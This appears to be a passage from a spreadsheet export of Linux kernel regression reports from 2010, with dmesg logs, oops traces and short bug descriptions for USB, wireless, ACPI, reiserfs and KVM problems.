ehci_hcd usb usb1: SerialNumber: 0000:02:00.2 usb usb1: usb_probe_device usb usb1: configuration #1 chosen from 1 choice usb usb1: adding 1-0:1.0 (config #1, interface 0) hub 1-0:1.0: usb_probe_interface hub 1-0:1.0: usb_probe_interface - got id hub 1-0:1.0: USB hub found hub 1-0:1.0: 5 ports detected hub 1-0:1.0: standalone hub hub 1-0:1.0: individual port power switching hub 1-0:1.0: individual port over-current protection hub 1-0:1.0: power on to power good time: 20ms hub 1-0:1.0: local power source is good hub 1-0:1.0: enabling power on all ports drivers/usb/core/inode.c: creating file '001' ehci_hcd 0000:02:00.2: GetStatus port 2 status 001803 POWER sig=j CSC CONNECT hub 1-0:1.0: port 2: status 0501 change 0001 hub 1-0:1.0: state 7 ports 5 chg 0004 evt 0000 hub 1-0:1.0: port 2, status 0501, change 0000, 480 Mb/s ehci_hcd 0000:02:00.2: port 2 high speed ehci_hcd 0000:02:00.2: GetStatus port 2 status 001005 POWER sig=se0 PE CONNECT usb 1-2: new high speed USB device using ehci_hcd and address 2 ehci_hcd 0000:02:00.2: port 2 high speed ehci_hcd 0000:02:00.2: GetStatus port 2 status 001005 POWER sig=se0 PE CONNECT usb 1-2: default language 0x0409 usb 1-2: udev 2, busnum 1, minor = 1 usb 1-2: New USB device found, idVendor=058f, idProduct=6332 usb 1-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3 usb 1-2: Product: USB Reader usb 1-2: Manufacturer: usb 1-2: SerialNumber: 058F118111B usb 1-2: usb_probe_device usb 1-2: configuration #1 chosen from 1 choice usb 1-2: adding 1-2:1.0 (config #1, interface 0) usb-storage 1-2:1.0: usb_probe_interface usb-storage 1-2:1.0: usb_probe_interface - got id scsi0 : SCSI emulation for USB Mass Storage devices usb-storage: device found at 2 usb-storage: waiting for device to settle before scanning drivers/usb/core/inode.c: creating file '002' scsi 0:0:0:0: Direct-Access Generic USB SD Reader 1.00 PQ: 0 ANSI: 0 scsi 0:0:0:1: Direct-Access Generic USB MS Reader 1.03 PQ: 0 ANSI: 0 sd 0:0:0:1: [sdb] Attached SCSI removable disk sd 0:0:0:0: [sda] 1012480 512-byte logical blocks: (518 MB/494 MiB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 03 00 00 00 sd 0:0:0:0: [sda] Assuming drive cache: write through usb-storage: device scan complete sd 0:0:0:0: [sda] Assuming drive cache: write through sda: sda1 sd 0:0:0:0: [sda] Assuming drive cache: write through sd 0:0:0:0: [sda] Attached SCSI removable disk kjournald starting. Commit interval 5 seconds ehci_hcd 0000:02:00.2: IAA with nothing to reclaim? ehci_hcd 0000:02:00.2: port 2 high speed ehci_hcd 0000:02:00.2: GetStatus port 2 status 001005 POWER sig=se0 PE CONNECT usb 1-2: reset high speed USB device using ehci_hcd and address 2 ehci_hcd 0000:02:00.2: port 2 high speed ehci_hcd 0000:02:00.2: GetStatus port 2 status 001005 POWER sig=se0 PE CONNECT ehci_hcd 0000:02:00.2: port 2 high speed ehci_hcd 0000:02:00.2: GetStatus port 2 status 001005 POWER sig=se0 PE CONNECT usb 1-2: reset high speed USB device using ehci_hcd and address 2 ehci_hcd 0000:02:00.2: port 2 high speed ehci_hcd 0000:02:00.2: GetStatus port 2 status 001005 POWER sig=se0 PE CONNECT Here it keeps trying, to no avail. The only workarounds that I found initially were mounting only in read only mode or mounting in read/write but only in USB1.0 mode (using ohci_hcd instead of ehci_hcd module). Neither of these workarounds were satisfactory for me. The solution for me was I removing that "offending" line from o2micro.h, then the USB2.0 drives are correctly mounted as in 2.6.31 and below, and the dmesg file is like the following: (extract from dmesg booting 2.6.32.24 with the corrected o2micro.h file, at the beginning you can see that now the Yenta O2 has ENABLED read prefetch and write burst, and now drives mount correctly) yenta_cardbus 0000:00:13.0: CardBus bridge found [1025:1010] yenta_cardbus 0000:00:13.0: O2: res at 0x94/0xD4: ea/00 yenta_cardbus 0000:00:13.0: O2: enabling read prefetch/write burst yenta_cardbus 0000:00:13.0: ISA IRQ mask 0x06b8, PCI irq 11 yenta_cardbus 0000:00:13.0: Socket status: 30000820 yenta_cardbus 0000:00:13.1: CardBus bridge found [1025:1010] yenta_cardbus 0000:00:13.1: ISA IRQ mask 0x06b8, PCI irq 11 yenta_cardbus 0000:00:13.1: Socket status: 30000006 pcmcia_socket pcmcia_socket0: pccard: CardBus card inserted into slot 0 pci 0000:02:00.0: reg 10 32bit mmio: [0x000000-0x000fff] pci 0000:02:00.0: supports D1 D2 pci 0000:02:00.0: PME# supported from D0 D1 D2 D3hot pci 0000:02:00.0: PME# disabled pci 0000:02:00.1: reg 10 32bit mmio: [0x000000-0x000fff] pci 0000:02:00.1: supports D1 D2 pci 0000:02:00.1: PME# supported from D0 D1 D2 D3hot pci 0000:02:00.1: PME# disabled pci 0000:02:00.2: reg 10 32bit mmio: [0x000000-0x0000ff] pci 0000:02:00.2: supports D1 D2 pci 0000:02:00.2: PME# supported from D0 D1 D2 D3hot pci 0000:02:00.2: PME# disabled SCSI subsystem initialized usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb Initializing USB Mass Storage driver... usbcore: registered new interface driver usb-storage USB Mass Storage support registered. ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver ehci_hcd: block sizes: qh 60 qtd 96 itd 160 sitd 96 ehci_hcd 0000:02:00.2: enabling device (0000 -&gt; 0002) ehci_hcd 0000:02:00.2: EHCI Host Controller drivers/usb/core/inode.c: creating file 'devices' drivers/usb/core/inode.c: creating file '001' ehci_hcd 0000:02:00.2: new USB bus registered, assigned bus number 1 ehci_hcd 0000:02:00.2: reset hcs_params 0x2395 dbg=0 cc=2 pcc=3 ports=5 ehci_hcd 0000:02:00.2: reset portroute 1 0 1 0 0 ehci_hcd 0000:02:00.2: reset hcc_params e806 thresh 0 uframes 256/512/1024 park ehci_hcd 0000:02:00.2: park 0 ehci_hcd 0000:02:00.2: reset command 080b02 park=3 ithresh=8 period=1024 Reset HALT ehci_hcd 0000:02:00.2: Enabling legacy PCI PM ehci_hcd 0000:02:00.2: ...powerup ports... ehci_hcd 0000:02:00.2: MWI active ehci_hcd 0000:02:00.2: irq 11, io mem 0x14002000 ehci_hcd 0000:02:00.2: reset command 080b02 park=3 ithresh=8 period=1024 Reset HALT ehci_hcd 0000:02:00.2: init command 010009 (park)=0 ithresh=1 period=256 RUN ehci_hcd 0000:02:00.2: USB 2.0 started, EHCI 1.00 usb usb1: default language 0x0409 usb usb1: udev 1, busnum 1, minor = 0 usb usb1: New USB device found, idVendor=1d6b, idProduct=0002 usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb1: Product: EHCI Host Controller usb usb1: Manufacturer: Linux 2.6.32.24-PRUEBAS ehci_hcd usb usb1: SerialNumber: 0000:02:00.2 usb usb1: usb_probe_device usb usb1: configuration #1 chosen from 1 choice usb usb1: adding 1-0:1.0 (config #1, interface 0) hub 1-0:1.0: usb_probe_interface hub 1-0:1.0: usb_probe_interface - got id hub 1-0:1.0: USB hub found hub 1-0:1.0: 5 ports detected hub 1-0:1.0: standalone hub hub 1-0:1.0: individual port power switching hub 1-0:1.0: individual port over-current protection hub 1-0:1.0: power on to power good time: 20ms hub 1-0:1.0: local power source is good hub 1-0:1.0: enabling power on all ports drivers/usb/core/inode.c: creating file '001' ehci_hcd 0000:02:00.2: GetStatus port 2 status 001803 POWER sig=j CSC CONNECT hub 1-0:1.0: port 2: status 0501 change 0001 hub 1-0:1.0: state 7 ports 5 chg 0004 evt 0000 hub 1-0:1.0: port 2, status 0501, change 0000, 480 Mb/s ehci_hcd 0000:02:00.2: port 2 high speed ehci_hcd 0000:02:00.2: GetStatus port 2 status 001005 POWER sig=se0 PE CONNECT usb 1-2: new high speed USB device using ehci_hcd and address 2 ehci_hcd 0000:02:00.2: port 2 high speed ehci_hcd 0000:02:00.2: GetStatus port 2 status 001005 POWER sig=se0 PE CONNECT usb 1-2: default language 0x0409 usb 1-2: udev 2, busnum 1, minor = 1 usb 1-2: New USB device found, idVendor=058f, idProduct=6332 usb 1-2: New USB device strings: Mfr=1, Product=2, SerialNumber=3 usb 1-2: Product: USB Reader usb 1-2: Manufacturer: usb 1-2: SerialNumber: 058F118111B usb 1-2: usb_probe_device usb 1-2: configuration #1 chosen from 1 choice usb 1-2: adding 1-2:1.0 (config #1, interface 0) usb-storage 1-2:1.0: usb_probe_interface usb-storage 1-2:1.0: usb_probe_interface - got id scsi0 : SCSI emulation for USB Mass Storage devices usb-storage: device found at 2 usb-storage: waiting for device to settle before scanning drivers/usb/core/inode.c: creating file '002' scsi 0:0:0:0: Direct-Access Generic USB SD Reader 1.00 PQ: 0 ANSI: 0 scsi 0:0:0:1: Direct-Access Generic USB MS Reader 1.03 PQ: 0 ANSI: 0 sd 0:0:0:0: [sda] 1012480 512-byte logical blocks: (518 MB/494 MiB) sd 0:0:0:1: [sdb] Attached SCSI removable disk sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 03 00 00 00 sd 0:0:0:0: [sda] Assuming drive cache: write through usb-storage: device scan complete sd 0:0:0:0: [sda] Assuming drive cache: write through sda: sda1 sd 0:0:0:0: [sda] Assuming drive cache: write through sd 0:0:0:0: [sda] Attached SCSI removable disk kjournald starting. Commit interval 5 seconds EXT3 FS on sda1, internal journal EXT3-fs: recovery complete. EXT3-fs: mounted filesystem with writeback data mode. I have attached my hardinfo HTML report, got from my currently working 2.6.31 kernel, so you can have more information about the hardware in my laptop. It's an Acer Travelmate 524TE. I hope that all this information can help the developers to find a proper and permanent fix in future kernel versions. Thank you in advance and best regards. David Bluecame.</t>
  </si>
  <si>
    <t>iwlagn reports "Microcode SW error detected" on WPA2 access point</t>
  </si>
  <si>
    <t>2010-10-20 15:39 UTC</t>
  </si>
  <si>
    <t>Sarah Sharp</t>
  </si>
  <si>
    <t>2010-10-26 00:22 UTC</t>
  </si>
  <si>
    <t>I've upgraded my machine to 2.6.35-rc7, and now my Intel Corporation PRO/Wireless 5100 AGN won't connect to my home access point (secured with WPA2). The dmesg shows a lot of output from the iwlagn driver, and then "Microcode SW error detected." The same hardware and kernel combo successfully connected to open access points yesterday. I tried unloading and reloading the driver, but it still wouldn't connect (although there were less errors). dmesg and lspci are attached. I'll try upgrading to 2.6.36-rc8 and see if that fixes my issues. I'm not sure exactly which kernel version did work. I was running 2.6.35 for a long time, and that worked fine. I've been running 2.6.36-rc5 for a while, but I can't remember if I've tried to connect to my home wireless on that kernel. I'll try to bisect it if upgrading to 2.6.36-rc8 doesn't work. System is a Lenovo x200s laptop, if that makes a difference.</t>
  </si>
  <si>
    <t>kmemleak in acpi_cpufreq</t>
  </si>
  <si>
    <t>2010-10-21 14:49 UTC</t>
  </si>
  <si>
    <t>2010-10-26 19:45 UTC</t>
  </si>
  <si>
    <t>Hello, s2ram my ThinkPad T400 and wake it up gives : tfoerste@n22 ~/devel $ cat /sys/kernel/debug/kmemleak unreferenced object 0xf6115b80 (size 64): comm "modprobe", pid 1020, jiffies 4294676198 (age 19181.103s) hex dump (first 32 bytes): 00 00 00 00 e8 a2 24 00 01 00 00 00 00 9f 24 00 ......$.......$. 02 00 00 00 00 6a 18 00 03 00 00 00 00 35 0c 00 .....j.......5.. backtrace: [&lt;c123d2a7&gt;] kmemleak_alloc+0x27/0x50 [&lt;c109fdff&gt;] __kmalloc+0xcf/0x110 [&lt;f9b4f7ee&gt;] acpi_cpufreq_cpu_init+0x1ee/0x4e4 [acpi_cpufreq] [&lt;c11cf102&gt;] cpufreq_add_dev+0x142/0x3a0 [&lt;c11938e7&gt;] sysdev_driver_register+0x97/0x110 [&lt;c11ce686&gt;] cpufreq_register_driver+0x86/0x140 [&lt;f9b53080&gt;] 0xf9b53080 [&lt;c1001130&gt;] do_one_initcall+0x30/0x160 [&lt;c1062b79&gt;] sys_init_module+0x99/0x1e0 [&lt;c1002d97&gt;] sysenter_do_call+0x12/0x26 [&lt;ffffffff&gt;] 0xffffffff It happens w/ 2.6.35 kernel too BTW.</t>
  </si>
  <si>
    <t>[tip] NULL pointer dereference in free_irte()</t>
  </si>
  <si>
    <t>2.6.36-rc8</t>
  </si>
  <si>
    <t>2010-10-21 18:11 UTC</t>
  </si>
  <si>
    <t>2010-11-16 17:38 UTC</t>
  </si>
  <si>
    <t>Subject : [tip] NULL pointer dereference in free_irte() Submitter : Mike Galbraith &lt;efault@gmx.de&gt; Date : 2010-10-19 3:25 Message-ID : 1287458731.7546.9.camel@marge.simson.net References : http://marc.info/?l=linux-kernel&amp;m=128745875505836&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.36-rc5] r8169 regression...</t>
  </si>
  <si>
    <t>2010-10-21 18:14 UTC</t>
  </si>
  <si>
    <t>2011-03-30 22:12 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.36-rc5] r8169 regression... Submitter : Daniel J Blueman &lt;daniel.blueman@gmail.com&gt; Date : 2010-10-19 17:01 Message-ID : AANLkTimdrM0H=b1OzmJ_mxMFqe-Y-Hxs5Lof5PAmVdbj@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128750771109738&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kmemleak after mounting an encrypted (USB-)drive</t>
  </si>
  <si>
    <t>2010-10-22 16:30 UTC</t>
  </si>
  <si>
    <t>2012-05-19 01:22 UTC</t>
  </si>
  <si>
    <t>Milan Broz</t>
  </si>
  <si>
    <t>Created attachment 34412 [details] kernel config Hello, if I plugin my external USB drive into the docking station of a ThinkPad T400, and do this : $&gt;/sbin/cryptsetup luksOpen /dev/sdb2 media; mount /dev/mapper/media /mnt/media; umount /mnt/media; cryptsetup luksClose media I get this kmemleak - which wasn't observed in 2.6.35 : unreferenced object 0xeef1fb80 (size 256): comm "kworker/u:3", pid 426, jiffies 215934 (age 891.562s) hex dump (first 32 bytes): 7f 45 4c 46 01 01 01 00 50 bb b5 fc 30 fc f1 ee .ELF....P...0... 00 37 8e eb 00 06 00 00 00 02 00 00 60 fc f1 ee .7..........`... backtrace: [&lt;c123d2a7&gt;] kmemleak_alloc+0x27/0x50 [&lt;c109fdff&gt;] __kmalloc+0xcf/0x110 [&lt;c107ac6e&gt;] mempool_kmalloc+0xe/0x10 [&lt;c107adc1&gt;] mempool_alloc+0x41/0xf0 [&lt;fcb5be85&gt;] crypt_convert+0x295/0x2b0 [dm_crypt] [&lt;fcb5bef2&gt;] kcryptd_crypt+0x52/0x370 [dm_crypt] [&lt;c1046011&gt;] process_one_work+0x101/0x340 [&lt;c1046577&gt;] worker_thread+0x137/0x390 [&lt;c104b034&gt;] kthread+0x74/0x80 [&lt;c10032be&gt;] kernel_thread_helper+0x6/0x18 [&lt;ffffffff&gt;] 0xffffffff</t>
  </si>
  <si>
    <t>System hangs on Boot on Intel ATOM (samsung n510 @nynet)</t>
  </si>
  <si>
    <t>2010-10-24 02:18 UTC</t>
  </si>
  <si>
    <t>Christian Bahls</t>
  </si>
  <si>
    <t>2010-11-02 02:57 UTC</t>
  </si>
  <si>
    <t>i have a samsung n510 @nynet netbook starting in the 2.6.35 development cycle the system hangs occasionally, especially on boot This bug is present in 2.6.36 and 2.6.35.7 pressing the powerbutton or a key on the keyboard makes the system continue this bug is quite reliable reproduceable .. i did a bisection and ended up on following commit: 2671717265ae6e720a9ba5f13fbec3a718983b65 booting the system with "intel_idle.max_cstate=0" makes it not hang The effects are strongest when intel_idle.max_cstate=2 Mr Brown gave me some Homework to do, here it comes: failing .config .. attached output from lspci .. hopefully can be attached output from cat /proc/cpu .. hopefully can be attached output from acpidump .. hopefully can be attached output from dmidecode .. hopefully can be attached for a 2.6.36 boot with intel_idle.max_cstate=0 (and acpi_idle boot) output from grep . /sys/devices/system/cpu/cpuidle/* output from grep . /sys/devices/system/cpu/cpu*/cpuidle/*/* dmesg .. hopefully can be attached try intel_idle.max_cstate=1, include dmesg and increase the '1' until it fails My guess is that 1 will work, but some higher number will start failing. =&gt; max_cstate=2 fails the strongest ... max_cstate=4 has not such a strong effect without any other bootparams, try "nolapic_timer" =&gt; yes, works .. does not hang .. see (hopefully) attached dmesg ending in ".nolapic"</t>
  </si>
  <si>
    <t>Kernel 2.6.36 Bug during quotaon on reiserfs</t>
  </si>
  <si>
    <t>2010-10-24 16:57 UTC</t>
  </si>
  <si>
    <t>markus.gapp</t>
  </si>
  <si>
    <t>2011-01-06 15:40 UTC</t>
  </si>
  <si>
    <t>I get this bug during boot at enabling usrquta for a reiser(3)fs since 2.6.36. The kernel is a x86_64 smp. The reiserfs reisdes on a dm raid level 5. The same setup worked with kernel version 2.6.35.7, of course there was no other configuratrion change between 2.6.35.7 and 2.6.36. REISERFS warning (device dm-4): reiserfs-2500 finish_unfinished: cannot turn on journaled quota: error -3 ------------[ cut here ]------------ kernel BUG at fs/reiserfs/lock.c:43! invalid opcode: 0000 [#1] SMP last sysfs file: /sys/devices/virtual/vc/vcsa12/uevent CPU 5 Modules linked in: snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss quota_v2 quota_tree snd_hda_codec_atihdmi snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_pcm psmouse snd_timer evdev firewire_ohci snd pcspkr soundcore processor firewire_core thermal snd_page_alloc button crc_itu_t i5k_amb scsi_transport_iscsi tg3 libphy fuse nfs auth_rpcgss fscache lockd sunrpc dm_crypt dm_mirror dm_region_hash dm_log scsi_wait_scan uhci_hcd usb_storage ehci_hcd sr_mod cdrom sg Pid: 3916, comm: quotaon Not tainted 2.6.36_hope3-xw6600 #1 0A9Ch/HP xw6600 Workstation RIP: 0010:[&lt;ffffffff811581a3&gt;] [&lt;ffffffff811581a3&gt;] reiserfs_write_unlock+0x43/0x50 RSP: 0018:ffff880127a5dd78 EFLAGS: 00010203 RAX: ffff880129cef3e0 RBX: ffff8801298115d0 RCX: 000000000000006e RDX: ffff88012090c540 RSI: 0000000000000000 RDI: ffff88012a838000 RBP: ffff880127a5dd78 R08: 000000000000000b R09: ffff8801298115d0 R10: 00007f5abe320580 R11: 0000000000000246 R12: ffff880129811540 R13: ffff880129811680 R14: ffff88012adc3400 R15: 0000000000001000 FS: 00007f5abd54c700(0000) GS:ffff880001940000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f5abd5924c5 CR3: 000000012a741000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process quotaon (pid: 3916, threadinfo ffff880127a5c000, task ffff880129cef3e0) Stack: ffff880127a5ddc8 ffffffff81155d6f ffff880127a5dda8 ffffffff810d505c &lt;0&gt; 0000000000000002 ffff880127a5de28 ffff88012adc3400 0000000000000000 &lt;0&gt; 0000000000000002 ffff88012adc3400 ffff880127a5de68 ffffffff81141071 Call Trace: [&lt;ffffffff81155d6f&gt;] reiserfs_unpack+0x6f/0x160 [&lt;ffffffff810d505c&gt;] ? path_put+0x2c/0x40 [&lt;ffffffff81141071&gt;] reiserfs_quota_on+0x171/0x1d0 [&lt;ffffffff810d8056&gt;] ? do_path_lookup+0x36/0x60 [&lt;ffffffff81237245&gt;] ? strncpy_from_user+0x45/0x90 [&lt;ffffffff81119ac5&gt;] do_quotactl+0x4d5/0x520 [&lt;ffffffff810d505c&gt;] ? path_put+0x2c/0x40 [&lt;ffffffff8142b181&gt;] ? down_read+0x11/0x30 [&lt;ffffffff81119bbe&gt;] sys_quotactl+0xae/0x120 [&lt;ffffffff81002d2b&gt;] system_call_fastpath+0x16/0x1b Code: 75 29 8b 47 50 ff c8 89 47 50 83 f8 ff 74 09 c9 c3 0f 1f 80 00 00 00 00 48 c7 47 48 00 00 00 00 48 83 c7 28 e8 5f 26 2d 00 c9 c3 &lt;0f&gt; 0b eb fe 66 0f 1f 84 00 00 00 00 00 55 83 fe ff 48 89 e5 74 RIP [&lt;ffffffff811581a3&gt;] reiserfs_write_unlock+0x43/0x50 RSP &lt;ffff880127a5dd78&gt; ---[ end trace 488c3fb0de5127fd ]--- Despite the bug the fs in question is accessible, quota of course dont'work. Any susequent try to enable quota result in a stalled quotaon command without any output on console or dmesg. Thank you, Markus</t>
  </si>
  <si>
    <t>ACPI dynamic tables are not shown correctly in sysfs</t>
  </si>
  <si>
    <t>2010-10-26 01:59 UTC</t>
  </si>
  <si>
    <t>2010-11-03 02:26 UTC</t>
  </si>
  <si>
    <t>ACPI dynamic tables are not shown in /sys/firmware/acpi/tables/dynamic, but in /sys/firmware/acpi/tables/ instead. This is introduced by commit: 78f1699659963fff97975df44db6d5dbe7218e55 Author: Alex Chiang &lt;achiang@hp.com&gt; Date: Sun Dec 20 12:19:09 2009 -0700 ACPI: processor: call _PDC early because dynamic SSDT tables may be loaded in _PDC, before installing the ACPI table handler. we should invoke acpi_sysfs_init() before acpi_early_processor_set_pdc(), so that the table handler is installed before any dynamic tables loaded.</t>
  </si>
  <si>
    <t>kernel crash on boot in acpi_init() - Toshiba L505D-SP6905R Notebook</t>
  </si>
  <si>
    <t>2010-10-26 04:47 UTC</t>
  </si>
  <si>
    <t>Mario</t>
  </si>
  <si>
    <t>2011-07-30 06:53 UTC</t>
  </si>
  <si>
    <t>Hi, It's not possible to install Ubuntu 10.10 to the Toshiba L505D-SP6905R Notebook. This is, where the Live CD get stuck (you don't even get to the menu) I made ist with the alternate DVD to the menu, disabled ACPI by pressing F6, but then if you go for installation the screen keeps black.</t>
  </si>
  <si>
    <t>Regression in single stepping over hardware breakpoint (Wine)</t>
  </si>
  <si>
    <t>2010-10-27 23:41 UTC</t>
  </si>
  <si>
    <t>2010-12-05 19:55 UTC</t>
  </si>
  <si>
    <t>NETDEV WATCHDOG: eth0 (atl1c): transmit queue 0 timed out if high traffic goes through eth-card</t>
  </si>
  <si>
    <t>2.6.35-gentoo-r11</t>
  </si>
  <si>
    <t>2010-10-28 15:52 UTC</t>
  </si>
  <si>
    <t>mailrupile</t>
  </si>
  <si>
    <t>2011-02-28 17:03 UTC</t>
  </si>
  <si>
    <t>My ethernet card (Attansic Technology Corp. Device 1063) freezes on high in\out net traffic. If net traffic doesn't high (jabber and web surfing only) all OK. But if I'll run something like rtorrent or just try to download\upload one big file on good speed (&gt;100KB) it will freeze.</t>
  </si>
  <si>
    <t>NULL pointer deference at disk_replace_part_tbl+0x32</t>
  </si>
  <si>
    <t>2010-10-28 17:22 UTC</t>
  </si>
  <si>
    <t>2010-12-09 10:52 UTC</t>
  </si>
  <si>
    <t>I get the following NULL pointer dereference when I hook up my Nexus One to my laptop to enable USB tether. This is a regression between v2.6.36-rc8 and v2.6.36. I will bisect when I get a chance. input: TPPS/2 IBM TrackPoint as /devices/platform/i8042/serio1/serio2/input/input7 usb 1-3: USB disconnect, address 4 BUG: unable to handle kernel NULL pointer dereference at 00000000000003a0 IP: [&lt;ffffffff812aec32&gt;] disk_replace_part_tbl+0x32/0x80 PGD 0 Oops: 0000 [#1] SMP DEBUG_PAGEALLOC last sysfs file: /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq CPU 0 Modules linked in: &lt;etc&gt; Pid: 22, comm: khubd Not tainted 2.6.36-wl+ #13 6460DWU/6460DWU RIP: 0010:[&lt;ffffffff812aec32&gt;] [&lt;ffffffff812aec32&gt;] disk_replace_part_tbl+0x32/0x80 RSP: 0018:ffff88003b921990 EFLAGS: 00010282 RAX: ffffea0000cd0708 RBX: ffff880038a0cee0 RCX: ffff88003d001490 RDX: ffffea0000cb5c40 RSI: 0000000000000000 RDI: ffff880039f61df8 RBP: ffff88003b9219a0 R08: 0000000000000000 R09: ffff88003a1a58a8 R10: dead000000100100 R11: 0000000000000228 R12: 0000000000000000 R13: 0000000000000000 R14: ffff8800388f6e98 R15: 0000000000000293 FS: 0000000000000000(0000) GS:ffff88003ec00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 00000000000003a0 CR3: 0000000001a24000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process khubd (pid: 22, threadinfo ffff88003b920000, task ffff88003b918000) Stack: ffff880039f61df8 ffffffff81a67a60 ffff88003b9219c0 ffffffff812aed08 &lt;0&gt; ffff88003b9219c0 0000000000000000 ffff88003b9219e0 ffffffff813833f7 &lt;0&gt; 0000000000000086 ffff880039f61e68 ffff88003b921a10 ffffffff812bcd87 Call Trace: [&lt;ffffffff812aed08&gt;] disk_release+0x28/0x50 [&lt;ffffffff813833f7&gt;] device_release+0x27/0xa0 [&lt;ffffffff812bcd87&gt;] kobject_release+0x47/0x90 [&lt;ffffffff812bcd40&gt;] ? kobject_release+0x0/0x90 [&lt;ffffffff812be1e7&gt;] kref_put+0x37/0x70 [&lt;ffffffff812bcc47&gt;] kobject_put+0x27/0x60 [&lt;ffffffff812bcd40&gt;] ? kobject_release+0x0/0x90 [&lt;ffffffff812aed47&gt;] put_disk+0x17/0x20 [&lt;ffffffff813c3c37&gt;] sg_device_destroy+0x67/0xa0 [&lt;ffffffff813c3bd0&gt;] ? sg_device_destroy+0x0/0xa0 [&lt;ffffffff812be1e7&gt;] kref_put+0x37/0x70 [&lt;ffffffff813c3b9e&gt;] sg_remove+0xfe/0x130 [&lt;ffffffff81383d51&gt;] device_del+0xc1/0x1d0 [&lt;ffffffff81383e76&gt;] device_unregister+0x16/0x30 [&lt;ffffffff813b6e95&gt;] __scsi_remove_device+0xa5/0xc0 [&lt;ffffffff813b322c&gt;] scsi_forget_host+0x5c/0x80 [&lt;ffffffff813aab1f&gt;] scsi_remove_host+0x6f/0x120 [&lt;ffffffffa004c46b&gt;] quiesce_and_remove_host+0x6b/0xc0 [usb_storage] [&lt;ffffffffa004c592&gt;] usb_stor_disconnect+0x22/0x40 [usb_storage] [&lt;ffffffff8140934a&gt;] usb_unbind_interface+0x5a/0x1a0 [&lt;ffffffff81387055&gt;] __device_release_driver+0x75/0xe0 [&lt;ffffffff813871bd&gt;] device_release_driver+0x2d/0x40 [&lt;ffffffff8138617e&gt;] bus_remove_device+0xae/0xf0 [&lt;ffffffff81383db7&gt;] device_del+0x127/0x1d0 [&lt;ffffffff81405be0&gt;] usb_disable_device+0x70/0x130 [&lt;ffffffff813fee13&gt;] usb_disconnect+0x93/0x130 [&lt;ffffffff814004e7&gt;] hub_thread+0x487/0x1230 [&lt;ffffffff8105a5fb&gt;] ? dequeue_task_fair+0x8b/0x90 [&lt;ffffffff81082900&gt;] ? autoremove_wake_function+0x0/0x40 [&lt;ffffffff81400060&gt;] ? hub_thread+0x0/0x1230 [&lt;ffffffff810823a6&gt;] kthread+0x96/0xa0 [&lt;ffffffff8100bea4&gt;] kernel_thread_helper+0x4/0x10 [&lt;ffffffff81082310&gt;] ? kthread+0x0/0xa0 [&lt;ffffffff8100bea0&gt;] ? kernel_thread_helper+0x0/0x10 Code: 10 48 89 1c 24 4c 89 64 24 08 0f 1f 44 00 00 48 8b 5f 38 4c 8b a7 00 03 00 00 48 85 db 48 89 77 38 74 42 48 c7 43 18 00 00 00 00 &lt;49&gt; 8b bc 24 a0 03 00 00 e8 61 58 2c 00 4c 89 e7 e8 89 2e ff ff RIP [&lt;ffffffff812aec32&gt;] disk_replace_part_tbl+0x32/0x80 RSP &lt;ffff88003b921990&gt; CR2: 00000000000003a0 ---[ end trace 4704f0507cd6c869 ]---</t>
  </si>
  <si>
    <t>[KVM] Noacpi Windows guest can not boot up on 32bit KVM host</t>
  </si>
  <si>
    <t>2010-10-29 03:01 UTC</t>
  </si>
  <si>
    <t>xudong</t>
  </si>
  <si>
    <t>2011-01-04 10:20 UTC</t>
  </si>
  <si>
    <t>Host OS: ia32pae Guest OS: ia32pae Guest OS Type (Linux/Windows): Windows xp/2000/2003 (no acpi) kvm.git Commit: ce3d55e0d36be8f3e3b5a593d0e0b1c476701d82 qemu-kvm Commit:2f48918f8aaedcd6ab2b637f63927077973a54c7 Host Kernel Version: 2.6.36-rc3 Hardware: Westmere-WP and Sandybridge Bug detailed description: -------------------------- On IA32PAE KVM host system, Windows guest can not boot up without apci on(include Windows xp, 2000, 2003) This is a regression issue Uing currectly kvm, I changed qemu-kvm to a old commit 945b6fa1a023e6eb858489bd58e7d786fdc53a32, this issue can be reproduced too.</t>
  </si>
  <si>
    <t>Weird sound issue on 2.6.36</t>
  </si>
  <si>
    <t>2010-10-31 17:51 UTC</t>
  </si>
  <si>
    <t>2010-11-18 23:47 UTC</t>
  </si>
  <si>
    <t>Subject : Weird sound issue on 2.6.36 Submitter : Felipe Contreras &lt;felipe.contreras@gmail.com&gt; Date : 2010-10-24 22:07 Message-ID : AANLkTimd_ukkeT1Y7w5p-T20Y+yPwFD6uH1_Tmuubnbw@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128795807421558&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.35-&gt;2.6.36 regression, vanilla kernel panic, ppp or hrtimers crashing</t>
  </si>
  <si>
    <t>2010-11-01 19:45 UTC</t>
  </si>
  <si>
    <t>2010-12-19 13:41 UTC</t>
  </si>
  <si>
